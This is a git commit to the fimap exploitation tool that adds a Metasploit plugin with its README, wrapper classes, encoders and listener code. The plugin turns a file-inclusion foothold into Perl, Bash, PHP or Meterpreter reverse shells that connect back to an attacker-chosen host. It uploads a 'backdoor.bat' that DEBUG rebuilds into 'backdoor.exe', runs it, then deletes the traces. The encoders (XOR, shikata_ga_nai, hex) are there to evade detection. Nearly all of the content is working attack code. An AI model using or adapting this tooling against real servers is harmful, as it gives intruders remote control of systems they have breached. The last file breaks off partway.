Commit 6e177866 authored by fimap.dev's avatar fimap.dev

Added Xavier Garcia's metasploit binding exploit-plugin!

parent f729559f
These are the trusted plugins which are downloadable.
Introduction
------------
This plugin is taking advantage of the Pymetasploit Python module
to run Metasploit payloads in the target machine and gain further
access to the server and network.
Features
--------
This plugin uses Metasploit payloads for Unix and Windows boxes by using
system calls provided by Fimap. It also creates listeners in your running
msfconsole by using the XMLRPC interface.
Unix payloads:
- Perl Reverse shell
Creates another process executing a Perl onliner that will connect back
to your box.
- Bash reverse shell
/dev/tcp trick to connect back to the attacker machine.
This method will cause Fimap to crash because the payload runs in foreground
and Fimap will timeout waiting for the result of the execution.
- PHP reverse shell
A PHP script will be executed in the context of the web server. This script
will connect back to the attacker machine and spawn a shell.
This method will cause Fimap to crash because the payload runs in foreground
and Fimap will timeout waiting for the result of the execution.
Windows payloads:
- Meterpreter reverse shell
This payload uploads a Meterpreter binary encoded in Windows debug format and
executes it in the target machine.
This method will cause Fimap to crash because the payload runs in foreground
and Fimap will timeout waiting for the result of the execution. It can be fixed
by migrating the Meterpreter payload to another process once you have a session
in your msfconsole. At this point the plugin will clean the temporary files.
Using this module
------------------
It will automatically detect if the target machine is a Windows or Unix box and
will show you the available payloads for the given platform.
Once you have selected your payload, it will ask you for the LHOST and LPORT
variables that will be used to create the selected Metasploit payload.
The last step is provide the password used when loading the XMLRPC interface in
msfconsole. One important restriction is that msfconsole must be listening in
localhost and the standard port.
This is the right way to setup msfconsole to listen for XMLRPC requests where
abc123 is your password.
msf > load xmlrpc Pass=abc123 ServerType=Web
At this point, your payload will be executed and it will connect back to your msfconsole.
#
# Copyright (c) 2010 Xavier Garcia xavi.garcia@gmail.com
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of copyright holders nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from plugininterface import basePlugin
from plugins.msf.pymetasploit.MetasploitWrapper import *
from plugins.msf.pymetasploit.MetasploitXmlRpcListener import *
import getpass, tempfile, os
class msf(basePlugin):
isShellCode=False
lhost=""
lport=""
def plugin_init(self):
pass
def plugin_loaded(self):
pass
def plugin_exploit_modes_requested(self, langClass, isSystem, isUnix):
# This method will be called just befor the user gets the 'available attack' screen.
# You can see that we get the
# * langClass (which represents the current language of the script)
# * A boolean value 'isSystem' which tells us if we can inject system commands.
# * And another boolean 'isUnix' which will be true if it's a unix-like system and false if it's Windows.
# We should return a array which contains tuples with a label and a unique callback string.
ret = []
#print "Language: " + langClass.getName()
if (isSystem):
attack = ("Executes MSF reverse payloads", "msf.reverse_tcp")
ret.append(attack)
return(ret)
def msf_menu_unix(self,msfObj,lhost,lport,haxhelper):
print "Available payloads:"
print "1) Perl reverse tcp"
print "2) Bash reverse tcp"
print "3) PHP reverse tcp"
result=raw_input("Choose your payload: ")
if int(result) == 1:
self.isShellCode=True
msfObj.linuxPerlReverseShell(lhost,lport)
msfObj.createPayload()
return True
elif int(result) == 2:
self.isShellCode=True
msfObj.linuxBashReverseShell(lhost,lport)
msfObj.createPayload()
print "Warning: Fimap will hang and crash because this Bash payload will run in foreground"
return True
elif int(result)==3:
self.isShellCode=False
if haxhelper.getLangName() =="php":
isShellCode=False
msfObj.phpReverseShell(lhost,lport)
msfObj.createPayload()
msfObj.loadCustomPayload("<?php\n"+msfObj.getPayload()+"\n?>")
print "Warning: Fimap will hang and crash because this PHP payload will run in foreground"
return True
else:
return False
else:
self.msf_menu_unix(msfobj,lhost,lport,haxhelper)
def get_parameters(self):
self.lhost=raw_input("Please, introduce lhost: ")
self.lhost=self.lhost.strip("\n")
self.lport=raw_input("Please, introduce lport: ")
self.lport=self.lport.strip("\n")
self.password=getpass.getpass("Please, introduce the password for msfconsole: ")
def set_listener(self,payload):
Listener=MsfXmlRpcListener()
Listener.setPassword(self.password)
Listener.setLhost(self.lhost)
Listener.setLport(self.lport)
Listener.setPayload(payload)
print "Creating listener... "
try:
Listener.login()
Listener.launchHandler()
print "Listener created: PAYLOAD:%s LHOST:%s LPORT:%s " % (Listener.getPayload(),Listener.getLhost(),Listener.getLport())
except MsfXmlRpcListenerErr,err:
print err
def plugin_callback_handler(self, callbackstring, haxhelper):
# This function will be launched if the user selected one of your attacks.
# The two params you receive here are:
# * callbackstring - The string you have defined in plugin_exploit_modes_requested.
# * haxhelper - A little class which makes it very easy to send an injected command.
if (callbackstring == "msf.reverse_tcp"):
if (haxhelper.isUnix()):
# We are in unix
msfObj=MsfWrapper()
self.get_parameters()
if not self.msf_menu_unix(msfObj,self.lhost,self.lport,haxhelper):
print "Sorry, this is payload not supported in this architecture!"
return 0
self.set_listener("cmd/unix/reverse_netcat")
print "Executing your payload ... "
if self.isShellCode:
haxhelper.executeSystemCommand(msfObj.getPayload())
else: haxhelper.executeCode(msfObj.getPayload())
else:
self.get_parameters()
msfObj=MsfWrapper()
msfObj.winMeterpreterReverseTcp(self.lhost,self.lport)
msfObj.createPayload()
msfObj.encodeWinDebug()
fd, tmpPayload = tempfile.mkstemp(prefix="pymetasploit")
os.close(fd)
fd=open(tmpPayload,'w')
fd.write(msfObj.getPayload())
fd.close()
tmpDir=haxhelper.executeSystemCommand("echo %TEMP%")
haxhelper.executeSystemCommand(haxhelper.concatCommands(("cd "+tmpDir, " > T")))
dest = tmpDir+"\\backdoor.bat"
bytes = haxhelper.uploadfile(tmpPayload, dest, -1)
os.remove(tmpPayload)
print "%d bytes written to '%s'." %(bytes, dest)
self.set_listener("windows/meterpreter/reverse_tcp")
print "Launching now..."
command = haxhelper.concatCommands(("cd "+tmpDir, dest))
haxhelper.executeSystemCommand(command)
haxhelper.executeSystemCommand(tmpDir+"\\backdoor.exe")
haxhelper.executeSystemCommand("del "+tmpDir+"\\backdoor.exe")
haxhelper.executeSystemCommand("del "+tmpDir+"\\backdoor.bat")
haxhelper.executeSystemCommand("del "+tmpDir+"\\T")
<?xml version="1.0" encoding="UTF-8"?>
<plugin
name="msf_bindings"
startup="msf"
version="1"
autor="Xavier Garcia"
email="xavi.garcia@gmail.com"
url="http://fimap.googlecode.com"
/>
\ No newline at end of file
# Copyright (c) 2010 Xavier Garcia xavi.garcia@gmail.com
# Copyright (c) 2009, Fast-Track
# The function toWinDebug() is an adapted version of the script
# bin/ftsrc/binarypayloadgen.py from Fast-Track 4.0
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of copyright holders nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from plugins.msf.pymetasploit.MetasploitObj import MsfObj
from subprocess import *
import re,binascii,os,sys,time,tempfile
from sys import exit, stdout
class MsfEncodeExecErr(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class MsfEncode(object):
msfObj=None
def __init__(self,msfObj):
self.msfObj=msfObj
def toBase64(self):
self.msfObj.setPayload(base64.b64encode(self.msfObj.getPayload()))
#encodes the payload using Xor and a key
def toXor(self,key):
kIdx = 0
cryptStr = "" # empty 'crypted string to be returned
# loop through the string and XOR each byte with the keyword
# to get the 'crypted byte. Add the 'crypted byte to the
# 'crypted string
for x in range(len(self.msfObj.getPayload())):
cryptStr = cryptStr + \
chr( ord(self.msfObj.getPayload()[x]) ^ ord(key[kIdx]))
# use the mod operator - % - to cyclically loop through
# the keyword
kIdx = (kIdx + 1) % len(key)
self.msfObj.setPayload(cryptStr)
def toHex(self):
self.msfObj.setPayload(binascii.hexlify(self.msfObj.getPayload()))
def toShikataGaNai(self,times,arch):
#msfencode -c 10 -a x86 -t exe -e x86/shikata_ga_nai
msfencode=['msfencode','-c',str(times),'-a',str(arch),'-t','exe','-e','x86/shikata_ga_nai']
process=Popen(msfencode,stdout=PIPE,stderr=PIPE,stdin=PIPE)
stdOut, stdErr=process.communicate(self.msfObj.getPayload())
msfEncodeNoEncSucceed="No encoders succeeded"
if re.search(msfEncodeNoEncSucceed,stdOut,re.MULTILINE)!=None:
raise MsfEncodeExecErr("Error trying to generate payload: "+self.msfObj.getRequestedPayload()+" "+' '.join(self.msfObj.getParams()))
self.msfObj.setPayload(stdOut)
# returns a shell script that sends a binary to stdout when executed
# ./mysh.sh > backdoor
def toBash(self):
self.toHex()
bashPayload="#! /bin/bash\n\n"
bashPayload=bashPayload+"PAYLOAD=\"%s\"\n" % (self.msfObj.getPayload())
bashPayload=bashPayload+"echo -n -e $( echo $PAYLOAD|tr -d '[:space:]' | sed 's/../\\\\x&/g') > /tmp/uploaded"
self.msfObj.setPayload(bashPayload)
def toWinDebug(self):
try:
import psyco
psyco.full()
except ImportError:
pass
throwerror=300
filesize = lambda x,n: stdout.write(x+'\n') or throwerror#(n)#exit(n)
try:
fd, tmpPayload = tempfile.mkstemp(prefix="pymetasploit")
os.close(fd)
fd=open(tmpPayload,'wb')
fd.write(self.msfObj.getPayload())
fd.close()
fdout, temp_path = tempfile.mkstemp(prefix="pymetasploit")
os.close(fdout)
fileopen,writefile = open(tmpPayload,'rb'),open(temp_path, 'w')
except:
print "Something went wrong...."
FOOTER = ''.join(map(lambda x:"echo "+x+">>T\n",
["RCX","%X ","N T.BIN","WDS:0","Q"]))
FOOTER += 'DEBUG<T 1>NUL\n'
FOOTER += 'MOVE T.BIN backdoor.exe'
FC,CX = 0, fileopen.seek(0,2) or fileopen.tell()
if (CX > 0xFFFF):
fileopen.close(); writefile.close()
filesize('[!] filesize exceeds 64kb, quitting.',1);
fileopen.seek(0,0)
writefile.write('DEL T 1>NUL 2>NUL\n')
try:
for chunk in xrange(0x1000):
finalwrite = fileopen.read(16) or writefile.write(FOOTER%CX) or filesize("",0)
if finalwrite.count('\0')==0x10: FC += 1
else:
if FC > 0:
writefile.write('echo FDS:%X L %X 00>>T\n'%((chunk-FC)*0x10,FC*0x10))
FC = 0
writefile.write('echo EDS:%X '%(chunk*0x10))
writefile.write(' '.join(map(lambda x:"%02X"%ord(x),finalwrite))+'>>T\n')
except Exception:
pass
writefile.close()
fd=open(temp_path,'r')
self.msfObj.setPayload(fd.read())
fd.close()
os.remove(temp_path)
os.remove(tmpPayload)
#
# Copyright (c) 2010 Xavier Garcia xavi.garcia@gmail.com
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of copyright holders nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
class MsfObj(object):
requestedPayload=""
params=[]
payload=""
mode=""
def __init__(self):
pass
def getRequestedPayload(self):
return self.requestedPayload
def getParams(self):
return self.params
def getPayload(self):
return self.payload
def getMode(self):
return self.mode
def setRequestedPayload(self,payload):
self.requestedPayload=payload
def setParams(self,params):
self.params=params
def setPayload(self,payload):
self.payload=payload
def setMode(self,mode):
self.mode=mode
#
# Copyright (c) 2010 Xavier Garcia xavi.garcia@gmail.com
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of copyright holders nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from plugins.msf.pymetasploit.MetasploitObj import MsfObj
from subprocess import *
import re
class MsfPayloadExecErr(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class MsfPayload(object):
msfObj=None
def __init__(self,msfObj):
self.msfObj=msfObj
def msfLoadPayload(self):
# we have to execute something like this:
# msfpayload php/reverse_php LPORT=8080 LHOST=127.0.0.1 R
#Error handling
# Unfortunately msfpayload does not return error messages to the parent
# process. It send a error string to stdout and ends the execution.
# ERROR MSGS sent msfpayload to stdout
# Error generating payload:
# Invalid payload:
# Framework Payloads (XYZ total)
errGenPayloadPattern="^Error generating payload:"
invalidPayloadPattern="^Invalid payload:"
msfPayloadHelpPattern="Framework Payloads \(\d{1,} total\)"
msfpayload=['msfpayload']
msfpayload.append(self.msfObj.getRequestedPayload())
msfpayload.extend(self.msfObj.getParams())
msfpayload.append(self.msfObj.getMode())
process=Popen(msfpayload,stdout=PIPE,stderr=PIPE,stdin=None)
stdOut, stdErr=process.communicate()
# We have cached and error from MsfPayload :)
if re.search(errGenPayloadPattern,stdOut,re.MULTILINE)!=None or \
re.search(invalidPayloadPattern,stdOut,re.MULTILINE)!=None or \
re.search(msfPayloadHelpPattern,stdOut,re.MULTILINE)!=None:
raise MsfPayloadExecErr("Error trying to generate payload: "+self.msfObj.getRequestedPayload()+" "+' '.join(self.msfObj.getParams()))
self.msfObj.setPayload(stdOut)
#
# Copyright (c) 2010 Xavier Garcia xavi.garcia@gmail.com
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of copyright holders nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from plugins.msf.pymetasploit.MetasploitObj import MsfObj
from plugins.msf.pymetasploit.MetasploitPayload import MsfPayload
from plugins.msf.pymetasploit.MetasploitEncode import MsfEncode
class MsfWrapper(object):
msfObj=None
def __init__(self):
self.msfObj=MsfObj()
def phpReverseShell(self,lhost,lport):
self.msfObj.setRequestedPayload("php/reverse_php")
self.msfObj.setParams(["LHOST="+lhost,"LPORT="+lport])
self.msfObj.setMode("R")
def phpBindShell(self,rhost,lport):
self.msfObj.setRequestedPayload("php/reverse_php")
self.msfObj.setParams(["RHOST="+rhost,"LPORT="+lport])
self.msfObj.setMode("R")
def winMeterpreterReverseTcp(self,lhost,lport):
self.msfObj.setRequestedPayload("windows/meterpreter/reverse_tcp")
self.msfObj.setParams(["LHOST="+lhost,"LPORT="+lport])
self.msfObj.setMode("X")
def winMeterpreterReverseTcpRaw(self,lhost,lport):
self.msfObj.setRequestedPayload("windows/meterpreter/reverse_tcp")
self.msfObj.setParams(["LHOST="+lhost,"LPORT="+lport])
self.msfObj.setMode("R")
def linuxBindShell(self,lport):
self.msfObj.setRequestedPayload("linux/x86/shell_bind_tcp")
self.msfObj.setParams(["LPORT="+lport])
self.msfObj.setMode("X")
def linuxPerlReverseShell(self,lhost,lport):
self.msfObj.setRequestedPayload("cmd/unix/reverse_perl")
self.msfObj.setParams(["LHOST="+lhost,"LPORT="+lport])
self.msfObj.setMode("R")
def linuxBashReverseShell(self,lhost,lport):
self.msfObj.setRequestedPayload("cmd/unix/reverse_bash")
self.msfObj.setParams(["LHOST="+lhost,"LPORT="+lport])
self.msfObj.setMode("R")
def winShellReverseTcp(self,lhost,lport):
self.msfObj.setRequestedPayload("windows/shell_reverse_tcp")
self.msfObj.setParams(["LHOST="+lhost,"LPORT="+lport])
self.msfObj.setMode("X")
def createPayload(self):
msfP=MsfPayload(self.msfObj)
msfP.msfLoadPayload()
def encodeBase64(self):
msfE=MsfEncode(self.msfObj)
msfE.toBase64()
def encodeXor(self,key):
msfE=MsfEncode(self.msfObj)
msfE.toXor(key)
def encodeHex(self):
msfE=MsfEncode(self.msfObj)
msfE.toHex()
def encodeShikataGaNai(self,times=1,arch="x86"):
msfE=MsfEncode(self.msfObj)
msfE.toShikataGaNai(times,arch)
def encodeWinDebug(self):
msfE=MsfEncode(self.msfObj)
msfE.toWinDebug()
def encodeBash(self):
msfE=MsfEncode(self.msfObj)
msfE.toBash()
def getPayload(self):
return self.msfObj.getPayload()
def loadCustomPayload(self,payload):
self.msfObj.setPayload(payload)
def loadCustomPayloadFromFile(self,file):
msfObj=MsfWrapper()
fd=open(file,'rb')
payload=fd.read()
fd.close()
self.loadCustomPayload(payload)
#
# Copyright (c) 2010 Xavier Garcia xavi.garcia@gmail.com
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of copyright holders nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDERS OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import xmlrpclib
import socket
import sys
import time
class MsfXmlRpcListenerErr(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class MsfXmlRpcListener:
payload="cmd/unix/reverse_netcat"
lport="8080"
lhost="127.0.0.1"
user="msf"
password=""
connection=""
token=""
def __init__(self):
pass
def setPassword(self,passwd):
self.password=passwd